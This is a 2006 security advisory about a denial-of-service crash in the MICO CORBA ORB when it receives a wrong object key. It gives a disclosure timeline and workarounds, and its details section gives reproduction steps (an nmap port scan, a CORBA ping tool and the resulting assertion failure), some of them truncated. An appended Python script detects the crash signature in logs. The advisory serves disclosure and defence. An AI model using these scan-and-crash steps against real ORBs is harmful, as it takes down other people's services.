
MICO crashes when contacted with wrong IOR / DoS

== == == TOC == == ==

1. Affected Vendor
2. Affected Product
3. Vulnerability
4. Safety Hazard
5. Disclosure Timeline
6. Vendor Response
7. Patch / Workaround
8. Vulnerability Details


== 1. Affected Vendor ==
   Object Security

== 2. Affected Products ==
   MICO - Mico is CORBA, Open Source ORB
   tested on Version
       and latest from repository
   more info: http://www.mico.org

== 3. Vulnerability ==
   MICO crashes when contacted with wrong object key (part: orb-id or
   orb-creation time)

== 4. Safety Hazard ==
   critical, potential Denial-of-Service

== 5. Disclosure Timeline ==
   2006-06-27 Problem found and analysed / tested with other versions
   2006-06-29 Vulnerability reported to vendor and MICOs
   2006-07-05 2nd mail to vendor and mailing-list
   2006-07-06 Full disclosure

== 6. Vendor Response ==

== 7. Patch / Workaround ==
   No patch available yet.

   Possible workarounds:
   a) Don't use MICO in or over public networks
   b) Protect MICO with an (IIOP) firewall

== 8. Vulnerability Details ==
   The following is for educational purposes only!

   Start the orb, you'll crash # Example code
   -> http://wwwstud.informatik.uni-rostock.de/~cb098/mico_bug.tgz
       $ ./server
   scan your target...
       $ sudo nmap -sS -oM results.nmap -p 1-65535 /
           | grep unknown
       8010/tcp  open  unknown
       49576/tcp open  unknown
       51140/tcp open  unknown

   One of these ports could be the ORB. Let's try to ping
   (object._non_exists()) the last one. For this I'm using a special
   handmade CORBA-Ping-Prog. It's also possible to use JacORB's pingo.
   My JPing is available at
       $ java JPing -p corbaloc::
     orb.string_to_object             ... ok
     object exists? Exception caught; org.omg.CORBA.COMM_FAILURE:
     vmcid: SUN  minor code: 208 completed: Maybe

   The lines above indicate that something was wrong. On every active
   port you'll get COMM_FAILURE, but on the ORB port OBJECT_NOT_EXIST is
   expected and mandated by the OMG CORBA spec.
    (See http://www.omg.org)

   -- mico testserver crashed / output --
   A look at the server terminal shows that something is wrong.

   $ ./server
   0000001010000160000006c6f63616c686f73 742e6c6f63616c646f6d61696e00c4c71
   0100 000001000000010000001400000001000000010001000000000009010100000000
   00 # myior <-- everything is ok until here
   server: orb.cc:332: void CORBA::ORBInvokeRec::set_answer_invoke(
   CORBA::InvokeStatus, CORBA::Object*, CORBA::ORBRequest*,
   GIOP::AddressingDisposition): Assertion `_type == RequestInvoke' failed.
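
Added example (not part of the original advisory and not MICO's own code): a detector for the crash signature shown above, meant to run over captured server output while no patch is available. It rejoins glibc assert() messages that arrive wrapped over several lines; the function names, the continuation limit and the sample text are assumptions constructed for illustration.

```python
import re

# glibc assert() format: "<prog>: <file>:<line>: <function>: Assertion `<expr>' failed."
START_RE = re.compile(r"^\S+: [\w./+-]+:\d+: ")
ASSERT_RE = re.compile(r"(?P<prog>\S+): (?P<file>[\w./+-]+):(?P<line>\d+): "
                       r"(?P<func>.+?): Assertion `(?P<expr>.+?)' failed\.")
MAX_CONTINUATION_LINES = 6  # assumption: a wrapped assert message fits in a few lines


def find_assertions(text):
    """Return one dict per assert() failure, rejoining hard-wrapped lines."""
    hits, buf, extra = [], None, 0
    for raw in text.splitlines():
        part = raw.strip()
        if buf is None:
            if not START_RE.match(part):
                continue
            buf, extra = part, 0
        else:
            # A break after "::" or inside an identifier gets no space back.
            mid_token = buf.endswith("::") or (buf[-1].isalnum() and part[:1].islower())
            buf += ("" if mid_token else " ") + part
            extra += 1
        match = ASSERT_RE.search(re.sub(r"::\s+", "::", buf))
        if match:
            hits.append(match.groupdict())
            buf = None
        elif extra >= MAX_CONTINUATION_LINES:
            buf = None  # looked like an assert header but never completed
    return hits


def is_mico_invoke_assert(hit):
    """True for the failure signature quoted in this advisory."""
    return "ORBInvokeRec::set_answer_invoke" in hit["func"] and hit["expr"] == "_type == RequestInvoke"


# Constructed sample: the advisory's server output, IOR dump replaced by a placeholder.
SAMPLE = """\
$ ./server
IOR:<hex elided> # myior
server: orb.cc:332: void CORBA::ORBInvokeRec::set_answer_invoke(CORBA::
InvokeStatus, CORBA::Object*, CORBA:: ORBRequest*, GIOP::AddressingDisp
osition): Assertion `_type == RequestInvoke' failed.
"""

if __name__ == "__main__":
    for hit in find_assertions(SAMPLE):
        print(is_mico_invoke_assert(hit), hit["prog"], hit["file"], hit["line"], hit["expr"])
```

A match on this signature in the log of an ORB that is reachable from untrusted networks is a reason to check the workarounds in section 7.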